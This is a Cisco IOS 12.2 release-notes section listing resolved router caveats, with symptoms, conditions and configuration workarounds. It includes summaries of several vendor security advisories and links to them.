Resolved Caveats—Cisco IOS Release 12.2(29a)
Cisco IOS Release 12.2(29a) is a rebuild release for Cisco IOS Release 12.2(29). The caveats in this section are resolved in Cisco IOS Release 12.2(29a) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Miscellaneous
•
Symptoms: A router may reset its Border Gateway Protocol (BGP) session.
Conditions: This symptom is observed when a Cisco router that peers with other routers receives an Autonomous System (AS) path with a length that is equal to or greater than 255.
Workaround: Configure the bgp maxas limit command in such as way that the maximum length of the AS path is a value below 255. When the router receives an update with an excessive AS path value, the prefix is rejected and recorded the event in the log.
•
Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.
Cisco has made free software available that includes the additional integrity checks for affected customers.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
Resolved Caveats—Cisco IOS Release 12.2(29)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(29). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(29). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: Closing an existing Telnet session may cause a router to crash.
Conditions: This symptom is platform-independent
Workaround: There is no workaround.
•
Symptoms: The operation result of an IP SLA jitter probe shows a high packet MIA that is equal to the jitter's number of packets minus one. In the responder router, the responder debug message shows many error packets.
Conditions: This symptom is observed when multiple jitter probes (either from the same router or from different routers) are configured to send packets to the same destination IP address and the same destination port number and when the responder is turned off for a short time and turned on again.
Workaround: To prevent the symptom from occurring, configure the jitter probe to use a unique destination port number.
Alternate Workaround: If the symptom has occurred, turn off the responder by entering the no rtr responder global configuration command, wait until all jitter probes report "No connection," and then turn on the responder by entering the rtr responder global configuration command.
•
Symptoms: A Cisco AS5400 gateway might stop unexpectedly, showing the following error message on the console:
Breakpoint exception, CPU signal 23, PC = 0x603955C0
Conditions: This symptom has been observed with Cisco IOS Release 12.2(27). This symptom has not seen on releases after Cisco IOS Release 12.2(4)T or on Cisco IOS Release 12.3 and later releases. This symptom has been seen only if an invalid attribute is configured in profile.
Workaround: Configure all valid attributes in the profile.
DECnet
•
Symptoms: On a Cisco Router, removing DecNet routing from the configuration can cause it to reload with a bus error.
Conditions: This symptom has been observed when configuring more than one Tunnel interface, assigning decnet cost to them, and then removing the Tunnel interfaces. Subsequently if the decnet is unconfigured globally using the no decnet routing command, the router will reload with a bus error.
Workaround: Remove the decnet cost configuration in the Tunnel interfaces before removing the Tunnel interfaces themselves.
IBM Connectivity
•
Symptoms: DLSw circuits are established over the same peer connection when there are multiple remote peer connections to the same remote MAC address.
Conditions: This symptom is observed when DLSw load-balancing is configured and when there are multiple peers that have the dlsw icanreach mac-address mac-addr command enabled with the same remote MAC address for the mac-addr argument.
Workaround: Bounce the DLSw peer connection either by entering the dlsw disable command or by removing and reconfiguring the DLSw remote peer statement.
Further Problem Description: You can verify that the symptom occurs when the output of the show dlsw reachability command does not show the remote peer with the MAC address displayed as UNCONFIRMED or FOUND.
Interfaces and Bridging
•
Symptoms: A Versatile Interface Processor 2-50 (VIP2-50) crashes because of a Cybus error with DMA receive errors.
Conditions: This symptom is observed on a Cisco 7500 series that runs Cisco IOS Release 12.1 and that is configured with a PA-2FE that is installed in a VIP2-50. The symptom may also occur in other releases.
Workaround: There is no workaround.
•
Symptoms: Auto-provisioning may be disabled on a Cisco 7200 series that is configured with a PA-A3 port adapter.
Conditions: This symptom is observed when a VC class that is configured for create on-demand is attached to the main ATM interface and then the create on-demand configuration is removed and re-applied to the VC class.
Workaround: Enter the shutdown interface configuration command followed by the no shutdown interface configuration command on the ATM interface of the PA-A3 port adapter.
IP Routing Protocols
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages
Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
•
Symptoms: A router that is configured for OSPF may reload unexpectedly and reference the "ospf_build_one_paced_update" process.
Conditions: This is observed on a Cisco router that has a mixture of LSAs (of type 5 and 11) that travel throughout an autonomous system and LSAs (of any type other than type 5 and 11) that travel within a particular OSPF area. The symptom may occur at any time without any specific changes or configuration and is not specifically related to any type of LSA.
Workaround: There is no workaround.
Further Problem Description: The symptom is very unlikely to occur. The symptom does not occur on a router that has exclusively stub areas and NSSA areas. The symptom may occur when a router does not have exclusively stub areas and NSSA areas.
•
Symptoms: When Network Address Translation (NAT) is configured, TCP translations do no time out properly when the TCP session is closed in a normal way.
Conditions: This symptom is observed on a Cisco platform that runs Cisco IOS Release 12.3 and that integrates the fix for CSCed93710. A list of the affected releases can be found at http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCed93710.
Workaround: Lower the global NAT translation timeout period with the ip nat translation tcp-timeout seconds command.
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages
Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
Miscellaneous
•
Symptoms: There is no connectivity over an MLP link.
Conditions: This symptom is observed on a Cisco Catalyst 6000 series that is configured with a FlexWAN in which a port adapter is installed. MLP is configured on an interface of the port adapter.
Workaround: Enter the shutdown interface configuration command followed by the no shutdown interface configuration command on the affected interface.
•
Symptoms: A router crashes when you run the expValueCounter64Val object in the Expression MIB.
Conditions: This symptom is observed on a Cisco router when the expObjectSampleType object is set to delta (2) in the expValueCounter64Val object.
Workaround: There is no workaround.
•
Symptoms: A 4-port serial enhanced port adapter (PA-4T+) may receive packets, even though the status of the serial interface is "down/down."
Conditions: This symptom is observed on a PA-4T+ that is installed in a Cisco 7200 series router and that is connected to a 1-port serial WAN interface card (WIC-1T) that is installed in a Cisco 2600 series. The serial interfaces of both routers are connected with a CSU/DSU.
The input packet counter of the serial port of the PA-4T+ increments even though the status of the serial interface is "down/down." However, the 2600 series functions properly, and the input packet counter of its serial interface does not increment.
Possible Workaround: Administratively shut down the serial port.
•
Symptoms: A serial interface may stop transmitting, and the following error message may be generated:
%RSP-3-RESTART: interface Serial1/0/2, not transmitting
-Traceback= 403D8D88 403E2830 4036B72C 4036B718
Conditions: This symptom is observed on a Cisco 7500 series that is configured with an 8-port serial V.35 port adapter (PA-8T-V35).
Workaround for HDLC interfaces: Disable CDP, the passive interface, and the outbound IP ACL.
Workaround for Frame Relay interfaces: Disable CDP, the passive interface, the outbound IP ACL, and LMI.
•
Symptoms: When the Cisco IOS Firewall CBAC is configured, the router seems to have a software-forced reload caused by one of the inspections processed.
Conditions: This symptom is observed when the router is part of a DMVPN hub-spoke with a Cisco VoIP phone solution deployed on it and the router is connected to the central office over the Internet. The Cisco VoIP phone runs the SKINNY protocol.
Workaround: There is no workaround.
•
Symptoms: A Cisco 7200 series with high-speed serial interfaces such as HSSI interfaces or PA-2T3+ interfaces may reload unexpectedly.
Conditions: This symptom is observed after you have performed an OIR of the HSSI or PA-2T3+ port adapter while traffic was being processed.
Workaround: Stop the traffic while you perform the OIR or shut down the port adapter before you perform the OIR.
•
Symptoms: The line protocol of a serial interface of a PA-E3 may go down, and the output of the show interfaces serial slot/port command shows that the output queue is wedged (Output queue: 40/40) and that output drops increase.
Conditions: This symptom is observed on a Cisco 7204VXR that is equipped with a PA-E3 when a Fast Ethernet interface is either shut down or disconnected and when the router is configured in the following way:
–
–
Workaround: Either enter the shutdown command followed by no shutdown command on the serial interface of the PA-E3 or enter the clear interface serial slot/port command on the serial interface of the PA-E3.
•
Symptoms: A Cisco 3745 reloads because of a bus error. Just before the crash, the following error messages are generated:
%SYS-3-BAD_RESET: Questionable reset of process 149 on tty123
%SYS-3-HARIKARI: Process Exec top-level routine exited
Conditions: This symptom is observed on a Cisco 3745 that runs Cisco IOS Release 12.2(26) or Release 12.3(12) and that has an NM-2CE1T1-PRI network module that is configured for ISDN dial-in.
Workaround: There is no workaround.
•
Symptoms: The WIC-DSU-T1-V2 card can get stuck and will not be able to detect any alarms, loopback events, etc.
Conditions: When this symptom occurs, the DSU-T1-V2 may still be able to pass traffic.
Workaround: Bring the card up again by issuing the clear service- module serial slot|port command.
•
Symptoms: The TCP Window size is changed after NAT translation.
Conditions: This symptom is observed on a Cisco 7200 router with an NSE-1 processor board when PXF and NAT are enabled and TCP packets get forwarded.
Workaround: Disable PXF globally by usign the no ip pxf command during configuration.
•
Symptoms: Packets going in and out of the same NAT inside interface are getting translated.
Conditions: This symptom is observed on a Cisco 7200 with an NSE-1 processor board when PXF and NAT are enabled.
Workaround: Disable PXF globally by using the no ip pxf command in the configuration.
•
Symptoms: A Cisco 7200 series may reload unexpectedly when you perform an OIR of a PA-8T-V.35 serial port adapter. The tracebacks point to the mxt_periodic_processing routine.
Conditions: This symptom is observed on a Cisco 7200 series that is configured with an NPE-G1 and that processes a high load of AToM bidirectional traffic.
Workaround: Shut down the serial interface before you perform the OIR.
•
Symptoms: A high error rate may occur on a WIC-1DSU-T1-V2. Because of the large number of errors, the interface of the WIC-1DSU-T1-V2 may not come up.
Conditions: These symptoms are observed on a WIC-1-DSU-T1-V2 that is installed in a Cisco router.
Possible Workaround: The symptoms may clear when you replace the in-house cabling with Cat.5 cables.
•
Symptoms: Memory leak at the Cisco gatekeeper causes the memory to constantly increase.
Conditions: This symptom has been observed on a Cisco gatekeeper running Cisco IOS Release 12.2(8)T1 or later. DGK leaks memory when sequential LRQ is configured and there is only one remote zone to forward LRQs to.
Workaround: There is no workaround.
Wide-Area Networking
•
Symptoms: Packet forwarding may not function properly on a terminated Frame Relay permanent virtual circuit (PVC) that is configured on an ISDN link.
Conditions: This symptom is observed on a Cisco 7200 series. The symptom does not occur on other platforms.
Workaround: There is no workaround.
Resolved Caveats—Cisco IOS Release 12.2(28d)
Cisco IOS Release 12.2(28d) is a rebuild release for Cisco IOS Release 12.2(28). The caveats in this section are resolved in Cisco IOS Release 12.2(28d) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: Tracebacks or crash are seen during HTTP transactions with long URLs.
Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.
Workaround: Disable HTTP server using the no ip http server command.
•
A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.
Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml
•
Cisco IOS Software has been enhanced with the introduction of additional software checks to signal improper use of internal data structures. This enhancement was introduced in select Cisco IOS software releases published after April 5, 2007.
Details: With the new enhancement in place, Cisco IOS software will emit a "%DATACORRUPTION-1-DATAINCONSISTENCY" error message when it detects an inconsistency in its internal data structures. This is a new error message. The following is an example.
The %DATACORRUPTION-1-DATAINCONSISTENCY error message is preceded by a timestampMay 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy errorThe error message is then followed by a traceback.
It is important to note that this error message does not imply that packet data is being corrupted. It does, however, provide an early indicator of other conditions that can eventually lead to poor system performance or an IOS restart.
Recommended Action: Collect show tech-support command output and open a service request with the Technical Assistance Center (TAC) or designated support organization. Pay particular attention to any other error messages or error symptoms that accompany the "%DATACORRUPTION-1-DATAINCONSISTENCY" message and note those to your support contact.
IBM Connectivity
•
A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.
There are workarounds available for this vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml
IP Routing Protocols
•
Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.
Cisco has made free software available to address this vulnerability for affected customers.
There are workarounds available to mitigate the effects of the vulnerability.
This vulnerability was discovered during internal testing.
This advisory is available at:
http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
•
The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.
NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.
NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.
NHRP is not enabled by default for Cisco IOS.
This vulnerability is addressed by Cisco bug IDs CSCin95836 for non-12.2 mainline releases and CSCsi23231 for 12.2 mainline releases.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.
Miscellaneous
•
The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.
Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml
Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not timeout.
Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.
Workaround: There is no workaround.
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.
•
Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.
The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.
This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml
•
Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.
The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities.
This vulnerability does not apply to the IOS FTP Client feature.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.
•
Symptoms: Malformed SSL packets may cause a router to leak multiple memory blocks.
Conditions: This symptom is observed on a Cisco router that has the ip http secure server command enabled.
Workaround: Disable the ip http secure server command.
TCP/IP Host-Mode Services
•
The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.
This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.
Cisco has made free software available to address this vulnerability for affected customers.
This issue is documented as Cisco bug ID CSCek37177
There are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml
•
Symptoms: A router that is running RCP can be reloaded by a specific packet.
Conditions: This symptom is seen under the following conditions:
–
–
–
Workaround: Put access lists on the edge of your network blocking RCP packets to prevent spoofed RSH packets. Use another protocol such as SCP. Use VTY ACLs.
Resolved Caveats—Cisco IOS Release 12.2(28c)
Cisco IOS Release 12.2(28c) is a rebuild release for Cisco IOS Release 12.2(28). The caveats in this section are resolved in Cisco IOS Release 12.2(28c) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Miscellaneous
•
Symptoms: A Cisco router may experience a bus error crash.
Conditions: This symptom may be triggered by an event such as an ISDN connection.
Workaround: There is no workaround.
•
Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.
Cisco has made free software available that includes the additional integrity checks for affected customers.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.
Resolved Caveats—Cisco IOS Release 12.2(28b)
Cisco IOS Release 12.2(28b) is a rebuild release for Cisco IOS Release 12.2(28). The caveats in this section are resolved in Cisco IOS Release 12.2(28b) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
IP Routing Protocols
•
Symptoms: A router may reset its Border Gateway Protocol (BGP) session.
Conditions: This symptom is observed when a Cisco router that peers with other routers receives an Autonomous System (AS) path with a length that is equal to or greater than 255.
Workaround: Configure the bgp maxas limit command in such as way that the maximum length of the AS path is a value below 255. When the router receives an update with an excessive AS path value, the prefix is rejected and recorded the event in the log.
Miscellaneous
•
Symptoms: A router misses an entry in its label forwarding table, which is shown in the output of the show tag-switching forwarding-table EXEC command for the missing entry and in the output of the show ip cef detail EXEC command for the prefix.
Conditions: This symptom is observed on a Cisco router that is configured for Multiprotocol Label Switching (MPLS) and that learns its routes through iBGP from redundant route reflectors (RRs) when BGP labeling is not enabled.
Workaround: There is no workaround. However, when you enter the clear ip route EXEC command for the affected prefix, the prefix is reinstalled in the label forwarding table.
Resolved Caveats—Cisco IOS Release 12.2(28a)
Cisco IOS Release 12.2(28a) is a rebuild release for Cisco IOS Release 12.2(28). The caveats in this section are resolved in Cisco IOS Release 12.2(28a) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Miscellaneous
•
NetFlow Feature Acceleration has been deprecated and removed from Cisco IOS. The global command ip flow-cache feature-accelerate will no longer be recognized in any IOS configuration.
If your router configuration does not currently contain the command ip flow-cache feature-accelerate, this change does not affect you.
The removal of NetFlow Feature Acceleration does not affect any other aspects of Netflow operation, for example Access-list processing. The features are separate and distinct.
Cisco Express Forwarding (CEF) supersedes the deprecated NetFlow Feature Acceleration.
Additionally, the following MIB objects and OIDs have been deprecated and removed from the netflow mib (CISCO-NETFLOW-MIB):
cnfFeatureAcceleration 1.3.6.1.4.1.9.9.99999.1.3
cnfFeatureAccelerationEnable 1.3.6.1.4.1.9.9.99999.1.3.1
cnfFeatureAvailableSlot 1.3.6.1.4.1.9.9.99999.1.3.2
cnfFeatureActiveSlot 1.3.6.1.4.1.9.9.99999.1.3.3
cnfFeatureTable 1.3.6.1.4.1.9.9.99999.1.3.4
cnfFeatureEntry 1.3.6.1.4.1.9.9.99999.1.3.4.1
cnfFeatureType 1.3.6.1.4.1.9.9.99999.1.3.4.1.1
cnfFeatureSlot 1.3.6.1.4.1.9.9.99999.1.3.4.1.2
cnfFeatureActive 1.3.6.1.4.1.9.9.99999.1.3.4.1.3
cnfFeatureAttaches 1.3.6.1.4.1.9.9.99999.1.3.4.1.4
cnfFeatureDetaches 1.3.6.1.4.1.9.9.99999.1.3.4.1.5
cnfFeatureConfigChanges 1.3.6.1.4.1.9.9.99999.1.3.4.1.6Resolved Caveats—Cisco IOS Release 12.2(28)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(28). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(28). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: A system used for reverse connections, such as a console server or other "milking machine" applications, may unexpectedly restart due to a bus error.
Conditions: The conditions under which this occurs are not well understood, but it is likely that frequent, short-lived connections are more likely to cause the problem than environments where connections are either long-lived or rarely opened and closed.
Workaround: There is no workaround.
•
Symptoms: An NTP broadcast client may fail to synchronize with an NTP broadcast server if the server cannot be reached from the client.
Conditions: This symptom is observed in Cisco IOS interim Release 12.2(12.11)T or a later release, including Release 12.3. However, the symptom may also occur in other releases.
Workaround: Ensure that the server can be reached from the client.
•
Symptoms: Although there are free tty lines, you cannot make a Telnet connection and a "No Free TTYs error" message is generated.
Conditions: This symptom is observed when there are simultaneous Telnet requests.
Workaround: There is no workaround.
IBM Connectivity
•
Symptoms: DLSw does not function when a SDLC station has the sdlc role prim-xid-poll command enabled.
Conditions: This symptom is observed on a Cisco router that runs Cisco IOS Release 12.3(10). The DLSw circuit is established, but the router does not send the XID to the SDLC station.
Workaround: There is no workaround.
•
Symptoms: A software-forced crash may occur on a Cisco router that is configured with a Bisync Serial Tunnel (BSTUN).
Conditions: This symptom is observed when line flaps occur on the asynchronous line that is attached to the BSTUN while the router attempts to forward packets via the asynchronous line.
Workaround: Ensure that the asynchronous line does not flap.
Interfaces and Bridging
•
Symptoms: A few permanent virtual circuits (PVCs) go into a stuck state causing OutPktDrops on a Cisco 7200 router.
Conditions: This symptom occurs on a Cisco 7200 router running Cisco IOS Release 12.2(26) with a PA-A3-T3 ATM interface. The symptom may also occur in other releases.
Workaround: Remove and re-apply the PVC statement.
•
Symptoms: A Versatile Interface Processor 2-50 (VIP2-50) crashes because of a Cybus error with DMA receive errors.
Conditions: This symptom is observed on a Cisco 7500 series that runs Cisco IOS Release 12.1 and that is configured with a PA-2FE that is installed in a VIP2-50. The symptom may also occur in other releases.
Workaround: There is no workaround.
•
Symptoms: On a Cisco 7x00 series that runs Cisco IOS Release 12.3 and that is equipped with an ATM PA-A3 port adapter, the SAR chip of the port adapter may crash or the interface may become stuck.
Conditions: This symptom is observed when there is a high-traffic load on the ATM PA-A3 port adapter and when many VCs are created, deleted, and modified continuously. The symptom may also occur in other releases.
Workaround: There is no workaround.
IP Routing Protocols
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:
1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messagesSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.
Multiple Cisco products are affected by the attacks described in this Internet draft.
Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.
The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
•
Symptoms: A router that is configured for OSPF may reload unexpectedly and reference the "ospf_build_one_paced_update" process.
Conditions: This is observed on a Cisco router that has a mixture of LSAs (of type 5 and 11) that travel throughout an autonomous system and LSAs (of any type other than type 5 and 11) that travel within a particular OSPF area. The symptom may occur at any time without any specific changes or configuration and is not specifically related to any type of LSA.
Workaround: There is no workaround.
Further Problem Description: The symptom is very unlikely to occur. The symptom does not occur on a router that has exclusively stub areas and NSSA areas. The symptom may occur when a router does not have exclusively stub areas and NSSA areas.
•
Symptoms: A router may reload with a bus error exception, the crashinfo file shows an address error (a load or instruction fetch), and there is a spurious access in the crashinfo file.
Conditions: These symptoms are observed on a Cisco router that performs NAT on H.323 voice traffic.
Workaround: There is no workaround.
•
Symptoms: When Network Address Translation (NAT) is configured, TCP translations do no time out properly when the TCP session is closed in a normal way.
Conditions: This symptom is observed on a Cisco platform that runs Cisco IOS Release 12.3 and that integrates the fix for CSCed93170. A list of the affected releases can be found at http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCed93170.
Workaround: Lower the global NAT translation timeout period with the ip nat translation tcp-timeout seconds command.
•
A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).
